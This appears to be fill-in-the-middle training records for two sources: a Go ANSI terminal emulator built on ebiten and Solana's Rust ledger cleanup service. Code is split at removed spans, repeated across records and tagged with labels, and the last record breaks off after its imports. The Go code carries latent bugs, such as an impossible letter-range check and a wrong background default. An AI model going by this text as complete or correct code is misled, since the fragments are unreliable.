fg[91] = color{255, 85, 85} // Bright Red
fg[92] = color{85, 255, 85} // Bright Green
fg[93] = color{255, 255, 85} // Bright Yellow
fg[94] = color{85, 85, 255} // Bright Blue
fg[95] = color{255, 85, 255} // Bright Magenta
fg[96] = color{85, 255, 255} // Bright Cyan
fg[97] = color{255, 255, 255} // Bright White
c, ok := fg[i]
return c, ok
}
func colorParserBg(i int) (color, bool) {
bg := make(map[int]color, 16)
bg[40] = color{0, 0, 0} // Black
bg[41] = color{170, 0, 0} // Red
bg[42] = color{0, 170, 0} // Green
bg[43] = color{170, 85, 0} // Yellow
bg[44] = color{0, 0, 170} // Blue
bg[45] = color{170, 0, 170} // Magenta
bg[46] = color{0, 170, 170} // Cyan
bg[47] = color{170, 170, 170} // White
bg[100] = color{85, 85, 85} // Bright Black (Gray)
bg[101] = color{255, 85, 85} // Bright Red
bg[102] = color{85, 255, 85} // Bright Green
bg[103] = color{255, 255, 85} // Bright Yellow
bg[104] = color{85, 85, 255} // Bright Blue
bg[105] = color{255, 85, 255} // Bright Magenta
bg[106] = color{85, 255, 255} // Bright Cyan
bg[107] = color{255, 255, 255} // Bright White
c, ok := bg[i]
return c, ok
}
func New() *Console {
c := &Console{}
c.bgColor, _ = colorParserBg(40)
c.fgColor, _ = colorParserFg(37)
c.width = 80 * 9
c.height = 25 * 16
c.scale = 1.5
c.title = "term"
c.cursorSetBlink = true
c.img = image.NewRGBA(image.Rect(0, 0, c.width, c.height))
c.tmpScreen = ebiten.NewImage(c.width, c.height)
c.font.bitmap = bitmap
c.font.height = 16
c.font.width = 9
c.clear()
return c
}
func (c *Console) Run() (err error) {
// SetRunnableOnUnfocused
ebiten.SetRunnableOnUnfocused(true)
ebiten.SetWindowSize(c.width, c.height)
ebiten.SetWindowTitle(c.title)
err = ebiten.RunGame(c)
return err
}
func (c *Console) input() {
var r rune
for c := 'A'; c <= 'Z'; c++ {
if ebiten.IsKeyPressed(ebiten.Key(c) - 'A' + ebiten.KeyA) {
if ebiten.IsKeyPressed(ebiten.KeyShift) {
r = c
}
r = (c + 32) // convert to lowercase
fmt.Println(string(r))
}
}
}
func (c *Console) Update() error {
c.input()
c.drawText()
return nil
}
func (c *Console) Layout(outsideWidth, outsideHeight int) (int, int) {
return c.width, c.height
}
func (c *Console) Draw(screen *ebiten.Image) {
c.tmpScreen.ReplacePixels(c.img.Pix)
screen.DrawImage(c.tmpScreen, nil)
}
func (c *Console) clear() {
c.cursor = 0
for i := 0; i < len(c.videoTextMemory); i++ {
c.videoTextMemory[i].charID = ' '
c.videoTextMemory[i].bgColor = c.bgColor
c.videoTextMemory[i].fgColor = c.fgColor
c.videoTextMemory[i].blink = false
}
}
func (c *Console) drawText() {
i := 0
rows := 25
columns := 80
for row := 0; row < rows; row++ {
for col := 0; col < columns; col++ {
v := c.videoTextMemory[i]
if i == c.cursor {
c.drawCursor(v.charID, v.fgColor, v.bgColor, col, row)
} else {
c.drawChar(v.charID, v.fgColor, v.bgColor, col, row)
}
i++
}
}
}
func (c *Console) moveUp() {
columns := 80
copy(c.videoTextMemory[0:], c.videoTextMemory[columns:])
for i := len(c.videoTextMemory) - columns; i < len(c.videoTextMemory); i++ {
c.videoTextMemory[i].charID = ' '
c.videoTextMemory[i].bgColor = c.bgColor
c.videoTextMemory[i].fgColor = c.fgColor
c.videoTextMemory[i].blink = false
}
}
func (c *Console) | (charID int) {
c.videoTextMemory[c.cursor].fgColor = c.fgColor
c.videoTextMemory[c.cursor].bgColor = c.bgColor
c.videoTextMemory[c.cursor].charID = charID
c.cursor++
c.cursorLimit()
}
func (c *Console) cursorLimit() {
if c.cursor < 0 {
c.cursor = 0
return
}
columns := 80
rows := 25
for c.cursor >= rows*columns {
c.cursor -= columns
c.moveUp()
}
}
func (c *Console) Print(msg string) {
columns := 80
parseMode := false
csi := false
s := ""
for i := 0; i < len(msg); i++ {
v := msg[i]
switch {
case v == 7: // bell
// not implemented
case v == 8: // Backspace
c.cursor--
c.cursorLimit()
case v == 9: // tab \t
lin := int(c.cursor / columns)
col := int(c.cursor % columns)
ncol := int(col/4)*4 + 4 // tab size 4 and remove mod
c.cursor = lin*columns + ncol
c.cursorLimit()
case v == 10: // Line Feed, \n
c.cursor += columns
c.cursorLimit()
case v == 11: // Vertical tab
// not implemented
case v == 12: // Formfeed
// not implemented
case v == 13: // Carriage return \r
c.cursor = int(c.cursor/columns) * columns
c.cursorLimit()
case v == 27:
parseMode = true
case v == '7' && parseMode: // DEC primitive save cursor position
c.auxCursorPos = c.cursor // Save cursor position
parseMode = false
csi = false
case v == '8' && parseMode: // DEC primitive restore cursor position
c.cursor = c.auxCursorPos // Restore cursor position
parseMode = false
csi = false
case v == '[' && parseMode: // Control Sequence Introducer
csi = true
s = ""
case v == 'c' && csi: // Reset display to initial state
c.clear()
c.bgColor, _ = colorParserBg(40)
c.fgColor, _ = colorParserFg(37)
//bold = false
parseMode = false
csi = false
continue
case v == 'm' && csi:
sv := strings.Split(s, ";")
//bold := false
for _, j := range sv {
if j == "" {
continue
} else if j == "0" {
c.bgColor, _ = colorParserBg(40)
c.fgColor, _ = colorParserFg(37)
//bold = false
continue
} else if j == "1" {
//bool = true
continue
} else if j == "39" { // Default foreground color
c.fgColor, _ = colorParserFg(37)
continue
} else if j == "49" { // Default background color
c.bgColor, _ = colorParserBg(37)
continue
} else {
i, err := strconv.Atoi(j)
if err != nil {
fmt.Println(err, "code:", s)
continue
}
fgColor, ok := colorParserFg(i)
if ok {
c.fgColor = fgColor
continue
}
bgColor, ok := colorParserBg(i)
if ok {
c.bgColor = bgColor
continue
}
fmt.Println("ANSI code not implemented:", i)
}
}
parseMode = false
csi = false
case v == 'd' && csi:
i := 1
if s != "" {
var err error
i, err = strconv.Atoi(s)
if err != nil {
fmt.Println(err)
}
}
cpos := i * columns
if cpos < 2000 {
c.cursor = cpos
}
parseMode = false
csi = false
case v == 's' && csi:
c.auxCursorPos = c.cursor // Save cursor position
parseMode = false
csi = false
case v == 'u' && csi:
c.cursor = c.auxCursorPos // Restore cursor position
parseMode = false
csi = false
case v == 'A' && csi: // Cursor up
i := 1
if s != "" {
var err error
i, err = strconv.Atoi(s)
if err != nil {
fmt.Println(err)
}
}
c.cursor -= i * columns
c.cursorLimit()
parseMode = false
csi = false
case v == 'B' && csi: // Cursor down
i := 1
if s != "" {
var err error
i, err = strconv.Atoi(s)
if err != nil {
fmt.Println(err)
}
}
c.cursor += i * columns
c.cursorLimit()
parseMode = false
csi = false
case v == 'C' && csi: // Cursor forward
i := 1
if s != "" {
var err error
i, err = strconv.Atoi(s)
if err != nil {
fmt.Println(err)
}
}
c.cursor += i
c.cursorLimit()
parseMode = false
csi = false
case v == 'D' && csi: // Cursor back
i := 1
if s != "" {
var err error
i, err = strconv.Atoi(s)
if err != nil {
fmt.Println(err)
}
}
c.cursor -= i
c.cursorLimit()
parseMode = false
csi = false
case v == 'G' && csi:
i := 1
if s != "" {
var err error
i, err = strconv.Atoi(s)
if err != nil {
fmt.Println(err)
}
}
lin := int(c.cursor / columns)
cpos := lin*columns + i
if cpos < 2000 {
c.cursor = cpos
}
parseMode = false
csi = false
case v == 'f' && csi: // the same as H
fallthrough
case v == 'H' && csi: // set horizontal and vertical position
if s == "" {
c.cursor = 0
} else {
sv := strings.Split(s, ";")
if len(sv) == 2 {
lin, _ := strconv.Atoi(sv[0])
col, _ := strconv.Atoi(sv[1])
cpos := lin*columns + col
if cpos <= 2000 { // 25*80
c.cursor = cpos
}
}
}
parseMode = false
csi = false
case v == 'X' && csi: // Erase n characters from the current position
cpos := c.cursor
i := 1
if s != "" {
i, _ = strconv.Atoi(s)
}
for x := 1; x <= i; x++ {
if cpos+x < 2000 {
c.videoTextMemory[cpos+x].charID = ' '
}
}
c.cursor = cpos
parseMode = false
csi = false
case v == 'J' && csi:
if len(s) > 0 {
if s[0] == '2' {
c.clear()
}
}
parseMode = false
csi = false
case v >= 'a' &&
v <= 'z' &&
v <= 'A' &&
v <= 'Z' &&
parseMode:
parseMode = false
csi = false
case csi || parseMode:
s += string(v)
default:
c.put(int(msg[i]))
}
}
}
func (c *Console) set(x, y int, color color) {
p := 4*y*c.width + 4*x
c.img.Pix[p] = color.R
c.img.Pix[p+1] = color.G
c.img.Pix[p+2] = color.B
c.img.Pix[p+3] = 0xff
}
func (c *Console) drawCursor(index int, fgColor, bgColor color, x, y int) {
if c.cursorSetBlink {
if c.cursorBlinkTimer < 15 {
fgColor, bgColor = bgColor, fgColor
}
c.drawChar(index, fgColor, bgColor, x, y)
c.cursorBlinkTimer++
if c.cursorBlinkTimer > 30 {
c.cursorBlinkTimer = 0
}
return
}
c.drawChar(index, bgColor, fgColor, x, y)
}
func (c *Console) drawChar(index int, fgColor, bgColor color, x, y int) {
var (
a int
b int
lColor color
)
x = x * 9
y = y * 16
for b = 0; b < 16; b++ {
for a = 0; a < 9; a++ {
if a == 8 {
color := bgColor
if index >= 192 && index <= 223 {
color = lColor
}
c.set(a+x, b+y, color)
continue
}
i := index*16 + b
if bitmap[i]&(0x80>>a) != 0 {
lColor = fgColor
c.set(a+x, b+y, lColor)
continue
}
lColor = bgColor
c.set(a+x, b+y, lColor)
}
}
}
| put | identifier_name |
console.go | package console
import (
"fmt"
"image"
"strconv"
"strings"
"github.com/hajimehoshi/ebiten/v2"
)
type color struct {
R byte
G byte
B byte
}
type char struct {
charID int
fgColor color
bgColor color
blink bool
}
type Console struct {
videoTextMemory [25 * 80]char
fgColor color
bgColor color
auxCursorPos int
cursor int
height int
width int
scale float64
cursorSetBlink bool
cursorBlinkTimer int
tmpScreen *ebiten.Image
img *image.RGBA
title string
font struct {
height int
width int
bitmap []byte
}
}
func (c *Console) Write(p []byte) (n int, err error) {
c.Print(string(p))
return len(p), nil
}
func colorParserFg(i int) (color, bool) {
fg := make(map[int]color, 16)
fg[30] = color{0, 0, 0} // Black
fg[31] = color{170, 0, 0} // Red
fg[32] = color{0, 170, 0} // Green
fg[33] = color{170, 85, 0} // Yellow
fg[34] = color{0, 0, 170} // Blue
fg[35] = color{170, 0, 170} // Magenta
fg[36] = color{0, 170, 170} // Cyan
fg[37] = color{170, 170, 170} // White
fg[90] = color{85, 85, 85} // Bright Black (Gray)
fg[91] = color{255, 85, 85} // Bright Red
fg[92] = color{85, 255, 85} // Bright Green
fg[93] = color{255, 255, 85} // Bright Yellow
fg[94] = color{85, 85, 255} // Bright Blue
fg[95] = color{255, 85, 255} // Bright Magenta
fg[96] = color{85, 255, 255} // Bright Cyan
fg[97] = color{255, 255, 255} // Bright White
c, ok := fg[i]
return c, ok
}
func colorParserBg(i int) (color, bool) {
bg := make(map[int]color, 16)
bg[40] = color{0, 0, 0} // Black
bg[41] = color{170, 0, 0} // Red
bg[42] = color{0, 170, 0} // Green
bg[43] = color{170, 85, 0} // Yellow
bg[44] = color{0, 0, 170} // Blue
bg[45] = color{170, 0, 170} // Magenta
bg[46] = color{0, 170, 170} // Cyan
bg[47] = color{170, 170, 170} // White
bg[100] = color{85, 85, 85} // Bright Black (Gray)
bg[101] = color{255, 85, 85} // Bright Red
bg[102] = color{85, 255, 85} // Bright Green
bg[103] = color{255, 255, 85} // Bright Yellow
bg[104] = color{85, 85, 255} // Bright Blue
bg[105] = color{255, 85, 255} // Bright Magenta
bg[106] = color{85, 255, 255} // Bright Cyan
bg[107] = color{255, 255, 255} // Bright White
c, ok := bg[i]
return c, ok
}
func New() *Console {
c := &Console{}
c.bgColor, _ = colorParserBg(40)
c.fgColor, _ = colorParserFg(37)
c.width = 80 * 9
c.height = 25 * 16
c.scale = 1.5
c.title = "term"
c.cursorSetBlink = true
c.img = image.NewRGBA(image.Rect(0, 0, c.width, c.height))
c.tmpScreen = ebiten.NewImage(c.width, c.height)
c.font.bitmap = bitmap
c.font.height = 16
c.font.width = 9
c.clear()
return c
}
func (c *Console) Run() (err error) {
// SetRunnableOnUnfocused
ebiten.SetRunnableOnUnfocused(true)
ebiten.SetWindowSize(c.width, c.height)
ebiten.SetWindowTitle(c.title)
err = ebiten.RunGame(c)
return err
}
func (c *Console) input() {
var r rune
for c := 'A'; c <= 'Z'; c++ {
if ebiten.IsKeyPressed(ebiten.Key(c) - 'A' + ebiten.KeyA) {
if ebiten.IsKeyPressed(ebiten.KeyShift) {
r = c
}
r = (c + 32) // convert to lowercase
fmt.Println(string(r))
}
}
}
func (c *Console) Update() error {
c.input()
c.drawText()
return nil
}
func (c *Console) Layout(outsideWidth, outsideHeight int) (int, int) {
return c.width, c.height
}
func (c *Console) Draw(screen *ebiten.Image) {
c.tmpScreen.ReplacePixels(c.img.Pix)
screen.DrawImage(c.tmpScreen, nil)
}
func (c *Console) clear() {
c.cursor = 0
for i := 0; i < len(c.videoTextMemory); i++ {
c.videoTextMemory[i].charID = ' '
c.videoTextMemory[i].bgColor = c.bgColor
c.videoTextMemory[i].fgColor = c.fgColor
c.videoTextMemory[i].blink = false
}
}
func (c *Console) drawText() {
i := 0
rows := 25
columns := 80
for row := 0; row < rows; row++ {
for col := 0; col < columns; col++ {
v := c.videoTextMemory[i]
if i == c.cursor {
c.drawCursor(v.charID, v.fgColor, v.bgColor, col, row)
} else {
c.drawChar(v.charID, v.fgColor, v.bgColor, col, row)
}
i++
}
}
}
func (c *Console) moveUp() {
columns := 80
copy(c.videoTextMemory[0:], c.videoTextMemory[columns:])
for i := len(c.videoTextMemory) - columns; i < len(c.videoTextMemory); i++ {
c.videoTextMemory[i].charID = ' '
c.videoTextMemory[i].bgColor = c.bgColor
c.videoTextMemory[i].fgColor = c.fgColor
c.videoTextMemory[i].blink = false
}
}
func (c *Console) put(charID int) {
c.videoTextMemory[c.cursor].fgColor = c.fgColor
c.videoTextMemory[c.cursor].bgColor = c.bgColor
c.videoTextMemory[c.cursor].charID = charID
c.cursor++
c.cursorLimit()
}
func (c *Console) cursorLimit() {
if c.cursor < 0 {
c.cursor = 0
return
}
columns := 80
rows := 25
for c.cursor >= rows*columns {
c.cursor -= columns
c.moveUp()
}
}
func (c *Console) Print(msg string) {
columns := 80
parseMode := false
csi := false
s := ""
for i := 0; i < len(msg); i++ {
v := msg[i]
switch {
case v == 7: // bell
// not implemented
case v == 8: // Backspace
c.cursor--
c.cursorLimit()
case v == 9: // tab \t
lin := int(c.cursor / columns)
col := int(c.cursor % columns)
ncol := int(col/4)*4 + 4 // tab size 4 and remove mod
c.cursor = lin*columns + ncol
c.cursorLimit()
case v == 10: // Line Feed, \n
c.cursor += columns
c.cursorLimit()
case v == 11: // Vertical tab
// not implemented
case v == 12: // Formfeed
// not implemented
case v == 13: // Carriage return \r
c.cursor = int(c.cursor/columns) * columns
c.cursorLimit()
case v == 27:
parseMode = true
case v == '7' && parseMode: // DEC primitive save cursor position
c.auxCursorPos = c.cursor // Save cursor position
parseMode = false
csi = false
case v == '8' && parseMode: // DEC primitive restore cursor position
c.cursor = c.auxCursorPos // Restore cursor position
parseMode = false
csi = false
case v == '[' && parseMode: // Control Sequence Introducer
csi = true
s = ""
case v == 'c' && csi: // Reset display to initial state
c.clear()
c.bgColor, _ = colorParserBg(40)
c.fgColor, _ = colorParserFg(37)
//bold = false
parseMode = false
csi = false
continue
case v == 'm' && csi:
sv := strings.Split(s, ";")
//bold := false
for _, j := range sv {
if j == "" {
continue
} else if j == "0" {
c.bgColor, _ = colorParserBg(40)
c.fgColor, _ = colorParserFg(37)
//bold = false
continue
} else if j == "1" {
//bool = true
continue
} else if j == "39" { // Default foreground color
c.fgColor, _ = colorParserFg(37)
continue
} else if j == "49" { // Default background color
c.bgColor, _ = colorParserBg(37)
continue
} else {
i, err := strconv.Atoi(j)
if err != nil {
fmt.Println(err, "code:", s)
continue
}
fgColor, ok := colorParserFg(i)
if ok {
c.fgColor = fgColor
continue
}
bgColor, ok := colorParserBg(i)
if ok {
c.bgColor = bgColor
continue
}
fmt.Println("ANSI code not implemented:", i)
}
}
parseMode = false
csi = false
case v == 'd' && csi:
i := 1
if s != "" {
var err error
i, err = strconv.Atoi(s)
if err != nil {
fmt.Println(err)
}
}
cpos := i * columns
if cpos < 2000 {
c.cursor = cpos
}
parseMode = false
csi = false
case v == 's' && csi:
c.auxCursorPos = c.cursor // Save cursor position
parseMode = false
csi = false
case v == 'u' && csi:
c.cursor = c.auxCursorPos // Restore cursor position
parseMode = false
csi = false
case v == 'A' && csi: // Cursor up
i := 1
if s != "" {
var err error
i, err = strconv.Atoi(s)
if err != nil {
fmt.Println(err)
}
}
c.cursor -= i * columns
c.cursorLimit()
parseMode = false
csi = false
case v == 'B' && csi: // Cursor down
i := 1
if s != "" {
var err error
i, err = strconv.Atoi(s)
if err != nil {
fmt.Println(err)
}
}
c.cursor += i * columns
c.cursorLimit()
parseMode = false
csi = false
case v == 'C' && csi: // Cursor forward
i := 1
if s != "" {
var err error
i, err = strconv.Atoi(s)
if err != nil {
fmt.Println(err)
}
}
c.cursor += i
c.cursorLimit()
parseMode = false
csi = false
case v == 'D' && csi: // Cursor back
i := 1
if s != "" {
var err error
i, err = strconv.Atoi(s)
if err != nil {
fmt.Println(err)
}
}
c.cursor -= i
c.cursorLimit()
parseMode = false
csi = false
case v == 'G' && csi:
i := 1
if s != "" {
var err error
i, err = strconv.Atoi(s)
if err != nil {
fmt.Println(err)
}
}
lin := int(c.cursor / columns)
cpos := lin*columns + i
if cpos < 2000 {
c.cursor = cpos
}
parseMode = false
csi = false
case v == 'f' && csi: // the same as H
fallthrough
case v == 'H' && csi: // set horizontal and vertical position
if s == "" {
c.cursor = 0
} else {
sv := strings.Split(s, ";")
if len(sv) == 2 {
lin, _ := strconv.Atoi(sv[0])
col, _ := strconv.Atoi(sv[1])
cpos := lin*columns + col
if cpos <= 2000 { // 25*80
c.cursor = cpos
}
}
}
parseMode = false
csi = false
case v == 'X' && csi: // Erase n characters from the current position
cpos := c.cursor
i := 1
if s != "" {
i, _ = strconv.Atoi(s)
}
for x := 1; x <= i; x++ {
if cpos+x < 2000 {
c.videoTextMemory[cpos+x].charID = ' '
}
}
c.cursor = cpos
parseMode = false
csi = false
case v == 'J' && csi:
if len(s) > 0 {
if s[0] == '2' {
c.clear()
}
}
parseMode = false
csi = false
case v >= 'a' &&
v <= 'z' &&
v <= 'A' &&
v <= 'Z' &&
parseMode:
parseMode = false
csi = false
case csi || parseMode:
s += string(v)
default:
c.put(int(msg[i]))
}
}
}
func (c *Console) set(x, y int, color color) {
p := 4*y*c.width + 4*x
c.img.Pix[p] = color.R
c.img.Pix[p+1] = color.G
c.img.Pix[p+2] = color.B
c.img.Pix[p+3] = 0xff
}
func (c *Console) drawCursor(index int, fgColor, bgColor color, x, y int) |
func (c *Console) drawChar(index int, fgColor, bgColor color, x, y int) {
var (
a int
b int
lColor color
)
x = x * 9
y = y * 16
for b = 0; b < 16; b++ {
for a = 0; a < 9; a++ {
if a == 8 {
color := bgColor
if index >= 192 && index <= 223 {
color = lColor
}
c.set(a+x, b+y, color)
continue
}
i := index*16 + b
if bitmap[i]&(0x80>>a) != 0 {
lColor = fgColor
c.set(a+x, b+y, lColor)
continue
}
lColor = bgColor
c.set(a+x, b+y, lColor)
}
}
}
| {
if c.cursorSetBlink {
if c.cursorBlinkTimer < 15 {
fgColor, bgColor = bgColor, fgColor
}
c.drawChar(index, fgColor, bgColor, x, y)
c.cursorBlinkTimer++
if c.cursorBlinkTimer > 30 {
c.cursorBlinkTimer = 0
}
return
}
c.drawChar(index, bgColor, fgColor, x, y)
} | identifier_body |
ledger_cleanup_service.rs | //! The `ledger_cleanup_service` drops older ledger data to limit disk space usage
use solana_ledger::blockstore::Blockstore;
use solana_ledger::blockstore_db::Result as BlockstoreResult;
use solana_measure::measure::Measure;
use solana_metrics::datapoint_debug;
use solana_sdk::clock::Slot;
use std::string::ToString;
use std::sync::atomic::{AtomicBool, Ordering};
use std::sync::mpsc::{Receiver, RecvTimeoutError};
use std::sync::Arc;
use std::thread;
use std::thread::{Builder, JoinHandle};
use std::time::Duration;
// - To try and keep the RocksDB size under 400GB:
// Seeing about 1600b/shred, using 2000b/shred for margin, so 200m shreds can be stored in 400gb.
// at 5k shreds/slot at 50k tps, this is 500k slots (~5 hours).
// At idle, 60 shreds/slot this is about 4m slots (18 days)
// This is chosen to allow enough time for
// - A validator to download a snapshot from a peer and boot from it
// - To make sure that if a validator needs to reboot from its own snapshot, it has enough slots locally
// to catch back up to where it was when it stopped
pub const DEFAULT_MAX_LEDGER_SHREDS: u64 = 200_000_000;
// Allow down to 50m, or 3.5 days at idle, 1hr at 50k load, around ~100GB
pub const DEFAULT_MIN_MAX_LEDGER_SHREDS: u64 = 50_000_000;
// Check for removing slots at this interval so we don't purge too often
// and starve other blockstore users.
pub const DEFAULT_PURGE_SLOT_INTERVAL: u64 = 512;
// Remove a limited number of slots at a time, so the operation
// does not take too long and block other blockstore users.
pub const DEFAULT_PURGE_BATCH_SIZE: u64 = 256;
pub struct LedgerCleanupService {
t_cleanup: JoinHandle<()>,
}
impl LedgerCleanupService {
/// Starts the background cleanup service.
///
/// Spawns a thread named "solana-ledger-cleanup" that repeatedly waits for
/// new roots on `new_root_receiver` and purges ledger data so the store
/// stays near `max_ledger_shreds` shreds. The thread exits when `exit` is
/// set or when the root channel disconnects.
pub fn new(
    new_root_receiver: Receiver<Slot>,
    blockstore: Arc<Blockstore>,
    max_ledger_shreds: u64,
    exit: &Arc<AtomicBool>,
) -> Self {
    info!(
        "LedgerCleanupService active. Max Ledger Slots {}",
        max_ledger_shreds
    );
    let exit = exit.clone();
    // Root at which the last purge ran; throttles purging to once per
    // DEFAULT_PURGE_SLOT_INTERVAL slots.
    let mut last_purge_slot = 0;
    let t_cleanup = Builder::new()
        .name("solana-ledger-cleanup".to_string())
        .spawn(move || loop {
            if exit.load(Ordering::Relaxed) {
                break;
            }
            if let Err(e) = Self::cleanup_ledger(
                &new_root_receiver,
                &blockstore,
                max_ledger_shreds,
                &mut last_purge_slot,
                DEFAULT_PURGE_SLOT_INTERVAL,
            ) {
                match e {
                    // Sender dropped: no more roots will arrive, stop.
                    RecvTimeoutError::Disconnected => break,
                    // No root within the timeout: loop and re-check `exit`.
                    RecvTimeoutError::Timeout => (),
                }
            }
        })
        .unwrap();
    Self { t_cleanup }
}
fn find_slots_to_clean(
blockstore: &Arc<Blockstore>,
root: Slot,
max_ledger_shreds: u64,
) -> (u64, Slot, Slot) |
/// Receives the newest root from `new_root_receiver` and, when more than
/// `purge_interval` slots have passed since the last purge, removes old
/// slots so the ledger stays near `max_ledger_shreds` shreds.
///
/// Blocks up to one second waiting for a root, then drains the channel so
/// only the most recent root is used. Purging proceeds in batches of
/// `DEFAULT_PURGE_BATCH_SIZE` slots with a sleep between batches so other
/// blockstore users are not starved.
///
/// # Errors
/// `RecvTimeoutError::Timeout` if no root arrives within the timeout;
/// `RecvTimeoutError::Disconnected` if the sender was dropped.
pub fn cleanup_ledger(
    new_root_receiver: &Receiver<Slot>,
    blockstore: &Arc<Blockstore>,
    max_ledger_shreds: u64,
    last_purge_slot: &mut u64,
    purge_interval: u64,
) -> Result<(), RecvTimeoutError> {
    let mut root = new_root_receiver.recv_timeout(Duration::from_secs(1))?;
    // Drain the channel; act only on the newest root.
    while let Ok(new_root) = new_root_receiver.try_recv() {
        root = new_root;
    }
    // saturating_sub: if a root smaller than `last_purge_slot` ever arrives,
    // plain subtraction would panic in debug builds and wrap to a huge value
    // (forcing a spurious purge) in release builds.
    if root.saturating_sub(*last_purge_slot) > purge_interval {
        let disk_utilization_pre = blockstore.storage_size();
        info!(
            "purge: new root: {} last_purge: {} purge_interval: {} disk: {:?}",
            root, last_purge_slot, purge_interval, disk_utilization_pre
        );
        *last_purge_slot = root;
        let (num_shreds_to_clean, lowest_slot_to_clean, mut first_slot) =
            Self::find_slots_to_clean(blockstore, root, max_ledger_shreds);
        if num_shreds_to_clean > 0 {
            debug!(
                "cleaning up to: {} shreds: {} first: {}",
                lowest_slot_to_clean, num_shreds_to_clean, first_slot
            );
            loop {
                // Purge at most one batch per iteration.
                let current_lowest =
                    std::cmp::min(lowest_slot_to_clean, first_slot + DEFAULT_PURGE_BATCH_SIZE);
                let mut slot_update_time = Measure::start("slot_update");
                // Raise the blockstore's lowest_cleanup_slot before deleting
                // this batch.
                *blockstore.lowest_cleanup_slot.write().unwrap() = current_lowest;
                slot_update_time.stop();
                let mut clean_time = Measure::start("ledger_clean");
                blockstore.purge_slots(first_slot, Some(current_lowest));
                clean_time.stop();
                debug!(
                    "ledger purge {} -> {}: {} {}",
                    first_slot, current_lowest, slot_update_time, clean_time
                );
                first_slot += DEFAULT_PURGE_BATCH_SIZE;
                if current_lowest == lowest_slot_to_clean {
                    break;
                }
                // Yield between batches so other blockstore users progress.
                thread::sleep(Duration::from_millis(500));
            }
        }
        let disk_utilization_post = blockstore.storage_size();
        Self::report_disk_metrics(disk_utilization_pre, disk_utilization_post);
    }
    Ok(())
}
/// Emits a debug datapoint comparing ledger disk usage before and after a
/// purge. Nothing is reported if either size measurement failed.
fn report_disk_metrics(pre: BlockstoreResult<u64>, post: BlockstoreResult<u64>) {
    if let (Ok(before), Ok(after)) = (pre, post) {
        let delta = before as i64 - after as i64;
        datapoint_debug!(
            "ledger_disk_utilization",
            ("disk_utilization_pre", before as i64, i64),
            ("disk_utilization_post", after as i64, i64),
            ("disk_utilization_delta", delta, i64)
        );
    }
}
/// Blocks until the cleanup thread terminates, returning its join result.
pub fn join(self) -> thread::Result<()> {
    self.t_cleanup.join()
}
}
#[cfg(test)]
mod tests {
use super::*;
use solana_ledger::blockstore::make_many_slot_entries;
use solana_ledger::get_tmp_ledger_path;
use std::sync::mpsc::channel;
// Inserts 50 slots of 5 entries each, then runs cleanup_ledger with a tiny
// shred budget and verifies that the oldest slots were purged.
#[test]
fn test_cleanup() {
    solana_logger::setup();
    let blockstore_path = get_tmp_ledger_path!();
    let blockstore = Blockstore::open(&blockstore_path).unwrap();
    let (shreds, _) = make_many_slot_entries(0, 50, 5);
    blockstore.insert_shreds(shreds, None, false).unwrap();
    let blockstore = Arc::new(blockstore);
    let (sender, receiver) = channel();
    //send a signal to kill all but 5 shreds, which will be in the newest slots
    let mut last_purge_slot = 0;
    sender.send(50).unwrap();
    LedgerCleanupService::cleanup_ledger(&receiver, &blockstore, 5, &mut last_purge_slot, 10)
        .unwrap();
    //check that 0-40 don't exist
    blockstore
        .slot_meta_iterator(0)
        .unwrap()
        .for_each(|(slot, _)| assert!(slot > 40));
    drop(blockstore);
    Blockstore::destroy(&blockstore_path).expect("Expected successful database destruction");
}
// Benchmark-style test: doubles the number of inserted slots each round and
// logs insert/purge timings to eyeball how cleanup cost scales. Asserts only
// that every cleanup call succeeds.
#[test]
fn test_cleanup_speed() {
    solana_logger::setup();
    let blockstore_path = get_tmp_ledger_path!();
    let mut blockstore = Blockstore::open(&blockstore_path).unwrap();
    // Disable compaction so timings reflect purge work only.
    blockstore.set_no_compaction(true);
    let blockstore = Arc::new(blockstore);
    let (sender, receiver) = channel();
    let mut first_insert = Measure::start("first_insert");
    let initial_slots = 50;
    let initial_entries = 5;
    let (shreds, _) = make_many_slot_entries(0, initial_slots, initial_entries);
    blockstore.insert_shreds(shreds, None, false).unwrap();
    first_insert.stop();
    info!("{}", first_insert);
    let mut last_purge_slot = 0;
    let mut slot = initial_slots;
    let mut num_slots = 6;
    for _ in 0..5 {
        let mut insert_time = Measure::start("insert time");
        let batch_size = 2;
        let batches = num_slots / batch_size;
        for i in 0..batches {
            let (shreds, _) = make_many_slot_entries(slot + i * batch_size, batch_size, 5);
            blockstore.insert_shreds(shreds, None, false).unwrap();
            if i % 100 == 0 {
                info!("inserting..{} of {}", i, batches);
            }
        }
        insert_time.stop();
        let mut time = Measure::start("purge time");
        // Advance the root past everything just inserted, then purge.
        sender.send(slot + num_slots).unwrap();
        LedgerCleanupService::cleanup_ledger(
            &receiver,
            &blockstore,
            initial_slots,
            &mut last_purge_slot,
            10,
        )
        .unwrap();
        time.stop();
        info!(
            "slot: {} size: {} {} {}",
            slot, num_slots, insert_time, time
        );
        slot += num_slots;
        num_slots *= 2;
    }
    drop(blockstore);
    Blockstore::destroy(&blockstore_path).expect("Expected successful database destruction");
}
}
| {
let mut shreds = Vec::new();
let mut iterate_time = Measure::start("iterate_time");
let mut total_shreds = 0;
let mut first_slot = 0;
for (i, (slot, meta)) in blockstore.slot_meta_iterator(0).unwrap().enumerate() {
if i == 0 {
first_slot = slot;
debug!("purge: searching from slot: {}", slot);
}
// Not exact since non-full slots will have holes
total_shreds += meta.received;
shreds.push((slot, meta.received));
if slot > root {
break;
}
}
iterate_time.stop();
info!(
"checking for ledger purge: max_shreds: {} slots: {} total_shreds: {} {}",
max_ledger_shreds,
shreds.len(),
total_shreds,
iterate_time
);
if (total_shreds as u64) < max_ledger_shreds {
return (0, 0, 0);
}
let mut cur_shreds = 0;
let mut lowest_slot_to_clean = shreds[0].0;
for (slot, num_shreds) in shreds.iter().rev() {
cur_shreds += *num_shreds as u64;
if cur_shreds > max_ledger_shreds {
lowest_slot_to_clean = *slot;
break;
}
}
(cur_shreds, lowest_slot_to_clean, first_slot)
} | identifier_body |
ledger_cleanup_service.rs | //! The `ledger_cleanup_service` drops older ledger data to limit disk space usage
use solana_ledger::blockstore::Blockstore;
use solana_ledger::blockstore_db::Result as BlockstoreResult;
use solana_measure::measure::Measure;
use solana_metrics::datapoint_debug;
use solana_sdk::clock::Slot;
use std::string::ToString;
use std::sync::atomic::{AtomicBool, Ordering};
use std::sync::mpsc::{Receiver, RecvTimeoutError};
use std::sync::Arc;
use std::thread;
use std::thread::{Builder, JoinHandle};
use std::time::Duration;
// - To try and keep the RocksDB size under 400GB:
